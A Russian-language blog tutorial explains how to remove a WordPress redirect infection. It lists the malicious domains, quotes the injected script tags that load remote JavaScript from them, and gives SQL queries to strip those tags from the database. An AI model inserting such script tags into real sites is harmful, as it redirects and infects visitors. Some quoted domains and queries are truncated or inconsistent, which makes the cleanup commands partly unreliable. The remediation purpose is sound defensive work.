Как удалить вирус редиректа на WordPress сайте

Если ваш WordPress сайт взломали и при его открытии происходит редирект на другой сайт, то эта статья для вас. Мы расскажем, как удалить вирус редиректа на WordPress сайте.

На данный момент, вирус редиректа перенаправляет посетителей зараженного WordPress сайта на directednotconverted.ml, lowerbeforwarden.ml, donatelloflowfirstly.ga. Давайте разберемся и удалим это вредоносное перенаправление с вашего сайта.

Данный тип вредоносного ПО вставляет JavaScropt-редирект на каждую страницу и запись сайта. Поэтому, когда посетители заходят на вашу главную страницу или любую другую, они перенаправляются на вредоносный сайт с помощью JavaScript.

Список популярных вредоносных сайтов, которыми заражаются WordPress сайты:

• source.lowerbeforwarden.ml.
• scripts.lowerbeforwarden.ml.
• donatelloflowfirstly.ga.
• js.donatelloflowfirstly.ga.
• Source.lowerbeforwarden.ml.
• 0.directednotconverted.ml.
• go.donatelloflowfirstly.ga.

Почему WordPress сайт заражается вирусом редиректа?

Все мы знаем, что WordPress – это самая популярная CMS для ведения блогов. Именно поэтому, WP интересен взломщикам, чтобы распространять свои вирусы и получать из этого выгоду.

Зачастую, вирус на сайт попадает, если вы пользуетесь не лицензионным, взломанным (Nulled) программным обеспечением. Это могут быть плагины, в которых открыт расширенный функционал, либо премиум шаблоны, которые отвязаны от лицензии.

Если вы установили тему из не проверенного источника, то воспользуйтесь плагином проверки на вирусы TOC.

Но вирусы могут попасть на ваш сайт не только из взломанных плагинов или тем. Хакерам также интересны уязвимости в популярных плагинах, ведь их используют миллионы пользователей по всему миру.

Например, недавно была обнаружена уязвимость в плагине WordFence. Да-да, в том плагине, который включает в себя функции защитника от спама, вирусов и атак. Хакеры воспользовались этой уязвимостью и на миллионы сайтов получили вирус с редиректом на другие вредоносные веб-сайты.

Именно поэтому мы рекомендуем всегда обновляться до актуальной версии WordPress, использовать последнии версии плагинов и шаблонов.

Как удалить вирус редиректа с WordPress сайта

Первое, что нужно сделать, это подключиться к своему сайту по FTP или зайди в файловый менеджер на вашем хостинге. Перейдите в папку public_html вашего сайта. Если вы найдете файлы с именами _a , _f , _s, то удалите их, это вредоносное ПО.

Проверьте папку с плагинами и темами, если вы найдете какой-либо неизвестный файл PHP или JavaScript, то удалите этот файл.

Откройте файл index.php, такой файл может находиться в /wp-content/plugins/index.php или public_html/index.php. Найдите в этом файле такой код <script src = ‘*****’ type = ‘text / javascript’> </script>.

Пример:

<script src='https://scripts.lowerbeforwarden.m/src.js?n=n' type='text/javascript'></script>

<script src='https://js.donatelloflowfirstly.g/statistics.js?n=n' type='text/javascript'></script>

Удалите этот код, если вы его найдете. Вы также можете найти этот код в конце каждой вашей страницы или поста в редакторе записей в админке сайта. Также этот код может находиться в шаблонах записей, страниц и index.php.

Откройте phpMyAdmin и выберите свою базу данных. Откройте таблицу wp_post. Отредактируйте любой пост и посмотрите, есть ли этот скрипт или нет.

Чтобы удалить вредоносный код из всех записей на сайте, вам нужно открыть phpMyAdmin и выбрать имя своей базы данных. Далее запустите SQL-запрос, чтобы удалить вредоносный кусок кода. В нашем случае мы нашли 2 вредоносных скрипта:

<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns125' type='text/javascript'></script> <script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns125' type='text/javascript'></script>

Чтобы удалить lowerbeforwarden.ml

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts. lowerbeforwarden.ml/src.js?n=ns125' type='text/javascript'></script>", ""));

Чтобы удалить js.donatelloflowfirstly.ga

UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns125' type='text/javascript'></script>", ""));

Если вы нашли вредоносный скрипт в вашей записи, то составьте такой же запрос, только замените часть SQL-запроса под нужный вам.

UPDATE wp_posts SET post_content = (REPLACE (post_content, "Вставьте сюда вредоносный скрипт", ""));

Как удалить вирус редиректа при открытии сайта

Также вирусы с редиректом часто заменяют адрес домашней страницы. Это делают следующие вредоносные сайты:

• donatelloflowfirstly.ga
• 0.directednotconverted.ml

Чтобы это исправить, вам нужно отредактировать поля siteurl и home в таблице wp_options вашей базы данных. Убедитесь, что в этих полях указан адрес вашего домене.

Например, вы можете увидеть на скриншоте ниже, как вредоносный код на сайте заменил адрес сайта и вписал туда адрес вирусного скрипта. Если вы увидите такой скрипт у себя в базе данных – удаляйте его и вписывайте свой адрес сайта.

https://js.donatelloflowfirstly.ga/statistics.js?n=ns2

Проделав все эти действия, вы сможете удалить вирусы directednotconverted.ml и lowerbeforwarden.ml с вашего WordPress сайта.

За основу данной статьи взят данный материал – https://crazytechgo.com.

---

Мы часто видим, как многие пользователи задают нам вопросы по поводу непонятный редиректов на их WordPress сайте. Надеемся, что эта статья помогла вам и в будущем вы больше не столкнетесь с данной проблемой.